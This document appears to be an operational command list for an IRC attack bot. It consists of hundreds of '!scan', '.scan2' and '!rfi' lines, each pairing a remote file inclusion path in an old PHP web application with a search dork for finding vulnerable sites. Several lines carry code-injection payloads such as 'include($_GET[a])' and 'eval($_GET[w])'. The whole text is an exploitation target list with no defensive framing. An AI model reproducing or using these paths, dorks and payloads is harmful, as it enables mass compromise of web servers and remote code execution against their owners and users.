!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2?
!scan /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Forgotten your password?"+"No account yet?"
!scan /plugins/safehtml/HTMLSax3.php?dir[plugins]= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+
!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= "/index.php?article_id=8" "/index.php?article_id=8"
!scan /bookmark4u/lostpasswd.php?env[include_prefix]= "bookmark4u"
!scan ?custompluginfile[]= "index.php?categoryid=1"
!scan ?view=page&pagename= "Buy, sell, trade, date, events... post anything"
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "topgroupname"
!scan /cms/system/openengine.php?oe_classpath= “/cms/website.php?
!scan /popup.php?path= "erstellt mit PHPKIT"
!scan /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "includes/mambo.php" *fr*
!scan /bbs//skin/zero_vote/ask_password.php?dir= "zeroboard"+"zboard"+"board"+"bbs" *.kr
!scan index.php?go= inurl:"index.php?go="
!scan /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
!scan protection.php?action=logout&siteurl= PHPFanBase
!scan /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
!scan /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
!scan ///?_SERVER[DOCUMENT_ROOT]= /redaxo/include/addons/
!scan /?sIncPath= “/index.php?members_mode=top”
!scan /common/db.php?commonpath= “playing.php”
!scan includes/class_item.php?fileExtension= "Recently Listed Wanted Ads"
!scan error.php?dir= "category_head.php"
!scan error.php?dir= " ask_password.php"
!scan ////////?cmd&file= “index.php?cmd=10?
!rfi /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor -p 100
!scan /?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
!scan historytemplate.php?cms[support]=1&cms[tngpath]= historytemplate.php
!scan /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act= /kboard.php?board=
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "includes/mambo.php"
!scan ///?_SERVER[DOCUMENT_ROOT]= todofleetcontrol.php?
!scan /appserv/main.php?appserv_root= "appserv"+site:.tw
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= "Design by 7dana.com"
!scan /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0.6"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan help.php?css_path= phplive site:.ru
!scan /modules/Forums/admin/admin_smilies.php?phpbb_root_path= "php nuke" site:uk
!scan ////?_SERVER[DOCUMENT_ROOT]= /content/file.php
!scan //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path= show_image_in_imgtag.php?
!scan ///skin/ggambo7002_board/comment_modify.php?dir= comment_modify.php?

.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan2 /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=

.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
.scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver”
.scan2 /themes/default/index.php?main= “cfagcms” “cfagcms”
.scan2 /themes/default/index.php?main= “cfag cms”
.scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
.scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3&lang=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3&lang=en”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /index.php?cmd&file= “index.php?cmd=5?
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
!scan /servicios/tagboard/sp/ftag.php?mostrar= “tagboard”
!scan /manager/static/view.php?propID=0&INC= “phpRealty” “phpRealty”
!scan /footer.php?footer_file= “PHP-Crawler”
!scan /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= “Technote7″
!scan /includes/function_core.php?web_root= “X10media Mp3 Search Engine”
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement – © 2002-2004 by Christian Scheb – Stylemotion.de
!scan /?installed_config_file= “PhpJobScheduler”
!scan /pjsfiles/modify.php?installed_config_file= “PhpJobScheduler”
!scan errors.php?error= “/com_rwcards” “/com_rwcards”
!scan //vwar/backup/errors.php?error= “errors.php”
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= “php?option=com_rwcards” “php?option=com_rwcards”
!scan inc/functions.inc.php?config[ppa_root_path]= “Index – Albums”
!scan phphtml.php?htmlclass_path= “phphtml.php”
!scan lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “/adodb_lite” “/adodb_lite”
!scan /?path%5Bdocroot%5D= “/newspublish” “/newspublish”
!scan /?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan errors.php?error= “netcat_files”
!scan /index.php?DOCUMENT_ROOT= “netcat_files”
!scan errors.php?error= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan /?prefix= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%
22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C

%22+%22Terms+%26+Conditions%22
!scan ?sIncPath= “powered by boonex”
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
!scan errors.php?error= “powered by boonex”
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= “powered by boonex”
!scan errors.php?error= “/ray.3.5″ “/ray.3.5″
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= “/com_ponygallery”
!scan /?page= /?pagedb=?
!scan hw3.php?daysonly=0).include($_GET[file]).(0&file= “Current Conditions” “Sun & Moon Information”
!scan /?page= “ArticleBeach”
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]= “Powered by Orca Interactive Forum Script”
!scan errors.php?error= “Powered by Orca Interactive Forum Script”
!scan /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= “/sohoadmin/”
!scan /?include_path= “guestbook”
!scan /?include_path= “action”+”poll_ident”
!scan /admin/include/lib.module.php?mod_root= “/cmsworks”
!scan errors.php?error= “/com_extcalendar”
!scan /admin/templates/template_thumbnail.php?thumb_template= “Powered by HomePH Design”
!scan /includes/header.php?c_temp_path= “/header.php”
!scan /include/admin.lib.inc.php?site_path= “include/lib.inc.php”
!scan src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT= “/resource/categories”
!scan errors.php?error= “phpkit” “phpkit”
!scan errors.php?error= “/contenido/includes”
!scan popup.php?path= “phpkit” “phpkit”
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= “/contenido/includes”
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= “/plugins/jrBrowser/”
!scan /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= /weather/hw3.php/
!scan /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= “com_pollxt”
!scan /ktmllite/includes/ktedit/toolbar.php?dirDepth= “ktmllite” “ktmllite”
!scan errors.php?error= “Subdreamer”
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= “action”+”poll_ident”
!scan /inc/formmail.inc.php?script_root= “Powered By Form Mail Script”
!scan /phpAdsNew/view.inc.php?phpAds_path= “Copyright 2000-2002, PHPAUCTION.ORG”
!scan /authentication/errors.php?error= “phpbb3″
!scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= /phpbb3/
!scan errors.php?error= “phpRaider”
!scan /poll/booth.php?include_path= “action”+”poll_ident”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Anet”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aorg”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aus”
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “index.php%3Fpr%3D+site%3Aru”
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 12%22If+you+are+a+registered+member%2C+please+login.+If+you+are+not+registered+yet%2C+please+signup.%22
!scan /admin.php?include_path= “Total Records:” “HTML code is” “guestbook”
!scan /guestbook1//admin.php?include_path= “guestbook1″
!scan poll/booth.php?include_path= “Advanced Poll”
!scan index.php?url= index.php?url=
!scan /galeria.php?start=0&kategoria= /galeria.php?start=0&kategoria=
!scan home.php?index= “home.php?index=”
!scan head.php?adresa= head.php?
!scan /poll/png.php?include_path= extcalendar
!scan /includes/db_adodb.php?baseDir= “dotProject logo”
!scan index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid= allinurl: aid “com_xfaq”
!scan /jscript.php?my_ms[root]= intitle:”myspeach” “chat_exemple.php”
!scan includes/stats.inc.php?prefix= browse.php%3Fid%3D site:com
!scan components/com_sitemap/sitemap.php?mosConfig_admin_path= /component/option,com_sitemap/
!scan /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_= “Powered by Mambo”
!scan includes/useragent.inc.php?prefix= “/browse.php?id=”
!scan docs/front-end-demo/cart2.php?workdir= %22hosting.php?pt=r%22 site:au
!scan /include/lib.inc.php?site_path= “lib.inc.php”
!scan /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= “Joomla Component mosDirectory”
!scan /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= “/includes/joomla.php”
!scan /guestbook/errors.php?error= “Guestbook – Administration”
!scan /index.php?page= index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan errors.php?error= “powered by TalkBack”
!scan /components/errors.php?error= “com_simpleboard”
!scan /modules/errors.php?error= “/includes/mambo.php”
!scan /errors.php?error= “Joomla Visites”
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= “/rgboard/”
!scan /ch_readalso.php?read_xml_include= “Copyrights © 2005 Belgische Federale Overheidsdiensten”
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= “powered by Crafty Syntax Live Help 2.7″
!scan /dotproject//includes/db_connect.php?baseDir= “dotproject”
!scan modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE= modules/dungeon
!scan /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path= “com_letterman”
!scan /index.php?config=1&base_datapath= wmview.php
!scan errors.php?error= “index”+”of/”+”errors.php”
!scan /accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
!scan /include/write.php?dir= “/write.php?dir=”
!scan /errors.php?error= /errors.php?error=
!scan /components/com_flyspray/startdown.php?file= “/com_flyspray”
!scan /modules/xfsection/modify.php?dir_module= “xfsection” “xfsection”
!scan /common/db.php?commonpath= “samPHPweb” “samPHPweb”
!scan errors.php?error= “samPHPweb” “samPHPweb”
!scan config.inc.php?path_escape= “XZero Community Classifieds” “XZero Community Classifieds”
!scan inc/TabStrip.php?function= “includeTab” “includeTab”
!scan /config.inc.php?path_escape= “Classifieds for our community”
!scan errors.php?error= “Classifieds for our community”
!scan /admin/spaw/spaw_control.class.php?spaw_root= “xt_conteudo” “xt_conteudo”
!scan errors.php?error= “/appserv”
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= “index.php?name=PNphpBB2″
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “com_comprofiler” “com_comprofiler”
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= “mailaccess”
!scan /includes/functions_portal.php?phpbb_root_path= “phpbb” “phpbb”
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= “MakeXML4statusCounter.php” “MakeXML4statusCounter.php”
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= “cmses” “cmses”
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= “Redaxo 2.7.4″ “Redaxo 2.7.4″
!scan /faqsupport/samplefaqsupport.php?path[docroot]= “OneAdmin” “OneAdmin”
!scan /ecommerce/payment/cybersource.php?path[docroot]= “ecommerce”
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= “doceboCms” “doceboCms”
!scan /config/dbutil.bck.php?confdir= “/config/dbutil.bck.php”
!scan /config.inc.php?config%5broot_dir%5d= “CLASSIFIEDS”
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D= /bookmark4u/ /bookmark4u/
!scan /atom.php5?page= “atom.php5?page=”
!scan /ashnews.php?pathtoashnews= “pathtoashnews”
!scan /newspublish/include.php?path%5Bdocroot%5D= “newspublish”
!scan /agendax/addevent.inc.php?agendax_path= /agendax/
!scan /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= “PHP-CON v1.3″ “PHP-CON v1.3″
!scan /Neos_Chronos/header.php?base_folder= /Neos_Chronos/ /Neos_Chronos/
!scan /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path= “com_chronocontact” “com_chronocontact”
!scan /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /mwchat/ /mwchat/
!scan /%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]= “Cecommerce” “Cecommerce”
!scan /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path= /excelwriter/ /excelwriter/
!scan /inc/download_center_lite.inc.php?script_root= “Download Center Lite”
!scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
!scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= “com_thopper”
!scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= “com_pccookbook”
!scan /admin/business_inc/saveserver.php?thisdir= “saveserver.php”
!scan /admin/classes/TplLoad.php?full_path_to_public_program= “TplLoad.php”
!scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= “com_mambowiki”
!scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= “com_mambots”
!scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= “com_mambatstaff”
!scan /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path= “com_magazine”
!scan /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= “com_lurm_constructor”
!scan /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path= “com_loudmounth”
!scan /index.php?option=com_log&Itemid=&mosConfig_absolute_path= “com_log”
!scan /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= “com_lmo”
!scan /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path= “com_linkdirectory”
!scan /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path= “com_kochsuite”
!scan /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path= “com_jreactions”
!scan /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path= “com_loudmounth”
!scan /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path= “com_dbquery”
!scan /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path= “com_datsogallery”
!scan /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= “com_bayesiannaivefilter”
!scan /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= /xoopsgallery/ /xoopsgallery/
!scan /skin/zero_vote/error.php?dir= “zeroboard”
!scan /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= “/mambots/content/” “/mambots/content/”
!scan /drupal/?_menu[callbacks][1][callback]= “drupal”
!scan /config.inc.php?path_escape= “Powered by SNETWORKS PHP CLASSIFIEDS”
!scan /?mosConfig_absolute_path= “Joomla” “Joomla”
!scan /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “index.php?autoLoadConfig”
!scan /skin/zero_vote/ask_password.php?dir= “zeroboard” net “zeroboard” uk
!scan classes/core/language.php?rootdir= “LimeSurvey”
!scan classes/core/language.php?rootdir= “You have not provided a survey identification number”
!scan PHPDJ_v05/dj/djpage.php?page= allintext:”PHPDJ was created by www.php-mania.co.uk”
!scan /inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= inurl:”index.php?redir=”
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” inurl:index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= allinurl:”cmses”
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= “PHPSecurityAdmin”
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “Advanced Poll”
!scan active/components/xmlrpc/client.php?c[components]= “Pindorama”
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= “NuSEO PHP”
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= “com_jcs”
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= “”Powered by Coppermine”
!scan /default.php?page=home inurl:”/default.php?page=home”
!scan /default.php?page= inurl:”/default.php?page=home”
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= inurl:PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= “powered by Open Bulletin Board”
!scan config.php?fpath= “Powered By PUMA”
!scan /index.php?classified_path= “Vivvo Article Manager”
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
!scan content/article.php?ide= inurl:WM-News
!scan content/modify_go.php?pwfile= inurl:WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2″ site:fr
!scan language/lang_english/lang_main_album.php?phpbb_admin_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= “Segue v.”+”Middlebury College”
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= “Segue v.”+”Middlebury College”
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= “phpBB”
!scan contrib/mx_glance_sdesc.php?mx_root_path= “mx_glance”
!scan contrib/mx_glance_sdesc.php?mx_root_path= “mxBB”
